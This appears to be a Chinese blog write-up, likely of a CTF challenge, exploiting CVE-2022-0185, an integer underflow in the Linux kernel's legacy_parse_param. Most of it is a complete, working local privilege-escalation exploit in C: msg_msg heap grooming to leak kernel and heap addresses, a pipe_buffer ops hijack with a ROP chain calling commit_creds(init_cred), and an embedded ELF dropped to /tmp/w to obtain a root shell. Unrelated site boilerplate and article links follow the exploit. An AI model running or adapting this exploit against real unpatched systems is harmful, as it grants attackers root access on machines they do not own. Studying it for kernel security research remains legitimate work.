CVE-2022-0185

这是一个关于整型溢出的CVE。

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param) {struct legacy_fs_context *ctx = fc->fs_private;	// [1] ctx 与文件描述符相关unsigned int size = ctx->data_size;				// [2] size —— 目前已经写入 buffer 的长度size_t len = 0;int ret;[ ... ]switch (param->type) {case fs_value_is_string:len = 1 + param->size;						// [3] len = strlen(key) + 1 + strlen(value) 将要写入的长度, 对应到 mount option string key=valuecase fs_value_is_flag:len += strlen(param->key);break;default:return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported", param->key);}if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large"); // [4] 边界检查, 避免溢出[ ... ]if (!ctx->legacy_data) {ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);	// [5] 首次分配 4096 字节缓冲区if (!ctx->legacy_data) return -ENOMEM;}ctx->legacy_data[size++] = ',';      			// [6] 开始往 buffer 写数据, 先写个逗号, 再写 key, 再写 等号, 再写 value, 最后结尾写 NULL, 保存新的sizelen = strlen(param->key);memcpy(ctx->legacy_data + size, param->key, len);size += len;if (param->type == fs_value_is_string) {ctx->legacy_data[size++] = '=';memcpy(ctx->legacy_data + size, param->string, param->size);size += param->size;}ctx->legacy_data[size] = '\0';ctx->data_size = size;ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;return 0;
}

这是触发漏洞的函数,size每次都增加,会在 page_size-size-2发生溢出,由于size是unsigned类型,会下溢成一个极大数。

具体介绍可以看【kernel exploit】CVE-2022-0185 File System Context 整数溢出漏洞利用 — bsauce

本文主要介绍提权方法。

step1

泄露kbase。其实很明显,覆盖msg_msg->m_ts泄露stat,或者tty什么的也可以,一个kmalloc-4k的slab有8个object,为了防止一开始object布局乱起八糟的,我采用先分配8个msg_msg,再分配victim object,再分配8个msg_msg来泄露基址,覆盖的成功率很高,只是kmalloc-32的下一个不一定是stat,这一步成功的概率大概1/2。

当然,也和我固定取leak[510]有关,采用搜索的方法成功率应该解决100%。

 printf("[+] STEP1-------------------------------[+]\n");for(;i<7;i++){qu[i]=get_msg_queue();buf[5]=i+1;write_msg(qu[i],buf,4060,1);}fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);printf("[+] start to spray stat!!!\n");i=0;for(;i<0x100;i++){stat[i]=open("/proc/self/stat",0);}//1+21+1+1=24pat[21]='\x00';fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=7;for(;i<20;i++){qu[i]=get_msg_queue();buf[5]=i+1;write_msg(qu[i],buf,4060,1);}char* m_ts="\x60\x10\x00";fsconfig(fd,FSCONFIG_SET_STRING,"\x00",m_ts,0);//m_ts=0x2050i=0;for(;i<20;i++){memset(leak,0,10000);res=peek_msg(qu[i],leak,0x1060,0);if(res<0)err_exit("peek_msg");if(res==0x1060){kbase=leak[510]-0x1336770;break;}}//sleep(10);if(kbase==0||(kbase&0xfff)!=0){printf("[-] leak kbase false!!!\n");exit(0);}printf("[+] kbase:%lx;\n",kbase);

step2

这一步是泄露堆地址,因为我采用打pipe_buffer的方法,需要已知地址布置fake_ops。本CVE貌似开启了harden freelist,所以采用泄露msg_msg->next的方法来获取堆地址,构造kmalloc-1k-->kmalloc-64-->kmalloc-512的格局进行堆喷,泄露kmalloc-64上的msg_msg的next指针,其实只构造kmalloc-64-->kmalloc-512就可以了.......

 printf("[+] STEP2-------------------------------[+]\n");i=0;for(;i<8;i++){qr[i]=get_msg_queue();buf[5]=i+1;write_msg(qr[i],buf,4080,1);}fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);pat[21]='\x00';fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=8;for(;i<16;i++){qr[i]=get_msg_queue();buf[5]=i+1;write_msg(qr[i],buf,4080,1);}char* evn="\x50\x16\x00";fsconfig(fd,FSCONFIG_SET_STRING,"\x00",evn,0);printf("[+] start to spray heap_addr!!!\n");spray_msg();memset(leak,0,8000);i=0;for(;i<16;i++){res=peek_msg(qr[i],leak,0x1650,0);if(res<0)perror("peek_msg");if(res==0x1650){int j=0;for(;j<1000;j++){if(leak[j]==10){pipe_ff=leak[j-2];gadget=leak[j-3]+0x30;break;}}break;}}if(pipe_ff==0){printf("[-] leak heap_addr false!!!\n");exit(0);}printf("[+] pipe_ff:%lx;\n",pipe_ff);printf("[+] gadget:%lx;\n",gadget);

很明显,我们要在kmalloc-512上布置fake_ops,当然,我采用pt_regs的方法,所以其实就是堆喷`add rsp`这个gadget就可以了。

step3

到提权了,我看原有exp貌似将msg_msg->next执行pipe_buffer-0x30来构造UAF,但感觉将msg_msg前两个指针搞烂了,应该容易报错,也没细看它是怎么绕过的。但其实我们能修改pipe_buffer大小,细节可以看我前一篇文章,我将pipe_buffer修改为kmalloc-4k,然后覆盖ops为之前泄露的kmalloc-512+0x30就好了,用msg_msg在kmalloc-512堆喷gadget。

printf("[+] STEP3-------------------------------[+]\n");printf("[+] start to spray pipe_buffer!!!\n");i=0;for(;i<30;i++)pipe(pipe_fd[i]);i=0;for(;i<10;i++)fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=10;for(;i<30;i++)fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);char value[40];memset(value,0x41,40);memcpy(value+15,&gadget,8);fsconfig(fd, FSCONFIG_SET_STRING, "\x00", value, 0);printf("[+] STEP4-------------------------------[+]\n");printf("[+] start to spray gadgets!!!\n");close_msg();pop_rdi=kbase+0x10475ed;commit_creds=kbase+0x10c9f00;init_cred=kbase+0x286b7a0;add_rsp=kbase+0x18abf50;restore=kbase+0x1e00fb8;spray_gadget();printf("[+] start to hijack control flow!!!\n");i=0;for(;i<30;i++){close(pipe_fd[i][0]);__asm__("mov r15,pop_rdi;""mov r14,init_cred;""mov r13,commit_creds;""mov r12,restore;""mov rbp,0xdeadbeef;""mov rbx,0xdeadbeef;""mov r11,0xdeadbeef;""mov r10,0xdeadbeef;""mov r9,0xdeadbeef;""mov r8,0xdeadbeef");close(pipe_fd[i][1]);}get_shell();return 0;

problem

现在问题是,执行无论system('/bin/sh'),execve('/bin/sh',0,0)还是signal注册一下,都会造成segment fault,不能长久uid==0。

其实改成system('cat /flag')能将flag读出来。

void get_flag_file(){unsigned char elfcode[] = {0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00};FILE *fp;fp = fopen("/tmp/w", "wb");if (fp == NULL) {perror("fopen");return -1;}if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {perror("fwrite");return -1;}fclose(fp);system("chmod +x /tmp/w"); return;
}

最后只能execve('/tmp/w',0,0),然后自己去执行/tmp/sh,能够让uid==0。

以下是完整exp

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)struct list_head {uint64_t    next;uint64_t    prev;
};struct msg_msg {struct list_head m_list;uint64_t    m_type;uint64_t    m_ts;uint64_t    next;uint64_t    security;
};struct msg_msgseg {uint64_t    next;
};/*
struct msgbuf {long mtype;char mtext[0];
};
*/int get_msg_queue(void)
{return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}/*** the msgp should be a pointer to the `struct msgbuf`,* and the data should be stored in msgbuf.mtext*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{((struct msgbuf*)msgp)->mtype = msgtyp;return msgsnd(msqid, msgp, msgsz, 0);
}/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts,  uint64_t next, uint64_t security)
{msg->m_list.next = m_list_next;msg->m_list.prev = m_list_prev;msg->m_type = m_type;msg->m_ts = m_ts;msg->next = next;msg->security = security;
}size_t user_cs, user_ss, user_rflags, user_sp;void save_status()
{asm volatile ("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}void err_exit(char *msg)
{perror(msg);sleep(2);exit(EXIT_FAILURE);
}void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}void unshare_setup(uid_t uid, gid_t gid)
{int temp;char edit[0x100];unshare(CLONE_NEWNS|CLONE_NEWUSER);temp = open("/proc/self/setgroups", O_WRONLY);write(temp, "deny", strlen("deny"));close(temp);temp = open("/proc/self/uid_map", O_WRONLY);snprintf(edit, sizeof(edit), "0 %d 1", uid);write(temp, edit, strlen(edit));close(temp);temp = open("/proc/self/gid_map", O_WRONLY);snprintf(edit, sizeof(edit), "0 %d 1", gid);write(temp, edit, strlen(edit));close(temp);return;
}void get_flag_file(){unsigned char elfcode[] = {0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00};FILE *fp;fp = fopen("/tmp/w", "wb");if (fp == NULL) {perror("fopen");return -1;}if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {perror("fwrite");return -1;}fclose(fp);system("chmod +x /tmp/w"); return;
}char* sh="/bin/sh";void get_shell(){if(getuid()==0){printf("[+] success!!!\n");execve("/tmp/w",NULL,NULL);}else{printf("[-] something wrong");}
}int kk[100];void spray_msg(){char buf[10000];int j=0;for(;j<100;j++){kk[j]=get_msg_queue();write_msg(kk[j],buf,800,1);write_msg(kk[j],buf,10,2);write_msg(kk[j],buf,400,3);}printf("[+] 1k-->64-->512 constructed!!!\n");
}void close_msg(){char buf[10000];int j=0;for(;j<100;j++){read_msg(kk[j],buf,800,1);read_msg(kk[j],buf,10,2);read_msg(kk[j],buf,400,3);}printf("[+] msg_msg has been closed\n");
}int fd;size_t init_cred;
size_t commit_creds;
size_t pop_rdi;
size_t heap_addr;
size_t add_rsp;
size_t restore;
size_t buf[0x500];
size_t kbase=0;
size_t pipe_ff=0;
size_t gadget=0;
int stat[0x100];
char pat[300]={0};
int qu[20];
int qr[16];
int res;
int i=0;
size_t leak[2000];
int pipe_fd[30][2];void spray_gadget(){int gt[4096];size_t cover[56];int j=0;for(;j<56;j++)cover[j]=add_rsp;int i=0;for(;i<4096;i++){gt[i]=get_msg_queue();write_msg(gt[i],cover,400,1);}return;
}int main(){get_flag_file();signal(SIGSEGV,get_shell);bind_core(0);save_status();unshare_setup(getuid(), getgid());printf("[+] STEP1-------------------------------[+]\n");for(;i<7;i++){qu[i]=get_msg_queue();buf[5]=i+1;write_msg(qu[i],buf,4060,1);}fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);printf("[+] start to spray stat!!!\n");i=0;for(;i<0x100;i++){stat[i]=open("/proc/self/stat",0);}//1+21+1+1=24pat[21]='\x00';fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=7;for(;i<20;i++){qu[i]=get_msg_queue();buf[5]=i+1;write_msg(qu[i],buf,4060,1);}char* m_ts="\x60\x10\x00";fsconfig(fd,FSCONFIG_SET_STRING,"\x00",m_ts,0);//m_ts=0x2050i=0;for(;i<20;i++){memset(leak,0,10000);res=peek_msg(qu[i],leak,0x1060,0);if(res<0)err_exit("peek_msg");if(res==0x1060){kbase=leak[510]-0x1336770;break;}}//sleep(10);if(kbase==0||(kbase&0xfff)!=0){printf("[-] leak kbase false!!!\n");exit(0);}printf("[+] kbase:%lx;\n",kbase);printf("[+] STEP2-------------------------------[+]\n");i=0;for(;i<8;i++){qr[i]=get_msg_queue();buf[5]=i+1;write_msg(qr[i],buf,4080,1);}fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);pat[21]='\x00';fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=8;for(;i<16;i++){qr[i]=get_msg_queue();buf[5]=i+1;write_msg(qr[i],buf,4080,1);}char* evn="\x50\x16\x00";fsconfig(fd,FSCONFIG_SET_STRING,"\x00",evn,0);printf("[+] start to spray heap_addr!!!\n");spray_msg();memset(leak,0,8000);i=0;for(;i<16;i++){res=peek_msg(qr[i],leak,0x1650,0);if(res<0)perror("peek_msg");if(res==0x1650){int j=0;for(;j<1000;j++){if(leak[j]==10){pipe_ff=leak[j-2];gadget=leak[j-3]+0x30;break;}}break;}}if(pipe_ff==0){printf("[-] leak heap_addr false!!!\n");exit(0);}printf("[+] pipe_ff:%lx;\n",pipe_ff);printf("[+] gadget:%lx;\n",gadget);printf("[+] STEP3-------------------------------[+]\n");printf("[+] start to spray pipe_buffer!!!\n");i=0;for(;i<30;i++)pipe(pipe_fd[i]);i=0;for(;i<10;i++)fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);fd = fsopen("ext4", 0);if(fd<0)err_exit("open ext4");printf("[+] start to overflow!!!\n");strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");i=0;for (; i < 117; i++)fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);i=10;for(;i<30;i++)fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);char value[40];memset(value,0x41,40);memcpy(value+15,&gadget,8);fsconfig(fd, FSCONFIG_SET_STRING, "\x00", value, 0);printf("[+] STEP4-------------------------------[+]\n");printf("[+] start to spray gadgets!!!\n");close_msg();pop_rdi=kbase+0x10475ed;commit_creds=kbase+0x10c9f00;init_cred=kbase+0x286b7a0;add_rsp=kbase+0x18abf50;restore=kbase+0x1e00fb8;spray_gadget();printf("[+] start to hijack control flow!!!\n");i=0;for(;i<30;i++){close(pipe_fd[i][0]);__asm__("mov r15,pop_rdi;""mov r14,init_cred;""mov r13,commit_creds;""mov r12,restore;""mov rbp,0xdeadbeef;""mov rbx,0xdeadbeef;""mov r11,0xdeadbeef;""mov r10,0xdeadbeef;""mov r9,0xdeadbeef;""mov r8,0xdeadbeef");close(pipe_fd[i][1]);}get_shell();return 0;}

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/461236.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Linux网络】TCP_Socket

目录 TCP协议&#xff08;传输控制协议&#xff09; listen状态 accept和connect TCP_echo_server (1)创建套接字 &#xff08;2&#xff09;绑定 &#xff08;3&#xff09;设置listen状态 &#xff08;4&#xff09;loop &#xff08;5&#xff09;客户端 多线程远程…

摄像机实时接入分析平台LiteAIServer视频智能分析软件视频诊断中的抖动检测功能

在现代社会中&#xff0c;视频监控系统扮演着至关重要的角色&#xff0c;而视频质量直接影响到监控系统的可靠性和有效性。随着技术的不断进步&#xff0c;视频智能分析软件LiteAIServer作为一款领先的视频智能分析软件&#xff0c;通过引入抖动检测功能&#xff0c;进一步提升…

Excel重新踩坑4:快捷键;逻辑函数;文本函数;日期相关函数;查找与引用函数;统计类函数;数组公式

0、excel常用快捷键 基础快捷键&#xff1a; alt&#xff1a;快速区域求和&#xff1b; ★ altenter&#xff1a;强制换行&#xff08;因为在excel单元格中没法用enter换行&#xff09;&#xff1b;altj&#xff1a;强制换行符的替换删除&#xff0c;这里altj就是在替换中输入…

ABAP RFC SQL 模糊查询和多个区间条件

对于非选择屏幕的情况&#xff0c;RFC接口输入数据后&#xff0c;如何处理字符串模糊查询、日期区间查询、数字区间查询&#xff1a; 一、所有字符支持模糊查询&#xff0c;在SAP SQL中&#xff0c;使用 %S%来实现。 二、区间查询有3种情况&#xff1a; 1、没有值输入&#xf…

python通过pyperclip库操作剪贴板

pyperclip介绍 pyperclip是一个python库用于操作剪贴板&#xff0c;可以非常方便地将文本复制到剪贴板或从剪贴板获取文本。 通过pip进行安装&#xff1a;pip install pyperclip pyperclip的github地址 pyperclip使用 复制到剪贴板 import pypercliptext "Hello, Wo…

Golang | Leetcode Golang题解之第516题最长回文子序列

题目&#xff1a; 题解&#xff1a; func longestPalindromeSubseq(s string) int {n : len(s)dp : make([][]int, n)for i : range dp {dp[i] make([]int, n)}for i : n - 1; i > 0; i-- {dp[i][i] 1for j : i 1; j < n; j {if s[i] s[j] {dp[i][j] dp[i1][j-1] …

Virtuoso使用layout绘制版图、使用Calibre验证DRC和LVS

1 绘制版图 1.1 进入Layout XL 绘制好Schmatic后&#xff0c;在原理图界面点击Launch&#xff0c;点击Layout XL进入版图绘制界面。 1.2 导入元件 1、在Layout XL界面左下角找到Generate All from Source。 2、在Generate Layout界面&#xff0c;选中“Instance”&#…

摩科智能化一体化防盗门(物联网)项目

一&#xff0c;选题依据及意义 ①理论意义 目前国内外学者对智能门锁的研究取得了一些成果&#xff0c;但都局限于猫眼和门锁设计上。本课题在产品设计、服务设计等理论基础上&#xff0c;深入研究在安全与防护的背景下简约化即智能应用的门锁创新。在理论与实际探索上建立了…

记录一下方便的条件编译

1. 需要准备&#xff1a; 1-1、npm i cross-env -D 是跨平台的自定义编译 1-2、构造工具&#xff1a;vite/webpack > vite: import.meta.env.VITE_NODE_ENV > webpack:process.env.NODE_ENV这里使用vite为例子 1-3、 package.json 2. 思路与步骤 首先我们知道 axio…

企业数据泄露安全演练(分享)

该文章主要分享作者在XXX企业内部做的一次【数据泄露安全演练】&#xff0c;涉及演练背景、目的、演练流程、剧本设定、预期行为、结果等等。 以下是完整的演练方案&#xff0c;有不足的地方希望大家指出&#xff01;&#xff01; 需要原版方案电子版的可以联系作者获取。 演练…

[前端面试]计算机网络

TCP/IP 与OSI TCP/IP TCP/IP 四层模型是一个分层网络通信模型&#xff0c; 它将网络通信过程分为四个层次&#xff0c;这四层分别是&#xff1a;网络接口层、互联网层、传输层和应用层。 网络接口层负责在计算机和网络硬件之间传输数据&#xff0c;负责在物理网络上发送和接…

Conmi的正确答案——在Kibana中进入Elasticsearch的索引管理页面

Elasticsearch版本&#xff1a;7.17.25 Kibana版本&#xff1a;7.17.25 注&#xff1a;索引即类似mysql的表。 0、进入首页 1、未创建任何“索引模式”时&#xff1a; 1.1、点击左边的三横菜单&#xff1b; 1.2、点击“Discover”&#xff0c;进入“发现”页面&#xff1b; 2…

Marin说PCB之电源的Surface Current Density知多少?

小编我是一位资深的国漫迷&#xff0c;像什么仙逆&#xff0c;斗破&#xff0c;斗罗&#xff0c;完美世界&#xff0c;遮天&#xff0c;凡人修仙传&#xff0c;少年歌行等&#xff0c;为了可以看这些视频小编我不惜花费了攒了很多年的私房钱去开了这个三个平台的会员啊&#xf…

安卓开发之数据库的创建与删除

目录 前言&#xff1a;基础夯实&#xff1a;数据库的创建数据库的删除注意事项 效果展示&#xff1a;遇到问题&#xff1a;如何在虚拟机里面找到这个文件首先&#xff0c;找到虚拟机文件的位置其次&#xff0c;找到数据库文件的位置 核心代码&#xff1a; 前言&#xff1a; 安…

UV紫外相机

在产业设备领域&#xff0c;运用相机进行检测的需求很大&#xff0c;应用也很多样&#xff0c;对于图像传感器性能的期望逐年提升。在这样的背景下&#xff0c;可拍摄紫外线&#xff08;UV&#xff1a;Ultra Violet&#xff09;图像的相机拥有越来越广泛的应用场景。将UV照明和…

Python学习的自我理解和想法(22)

学的是b站的课程&#xff08;千锋教育&#xff09;&#xff0c;跟老师写程序&#xff0c;不是自创的代码&#xff01; 今天是学Python的第22天&#xff0c;学的内容是正则表达式&#xff0c;明天会出一篇详细实例介绍。电脑刚修好&#xff01;开学了&#xff0c;时间不多&…

ARM base instruction -- bfi

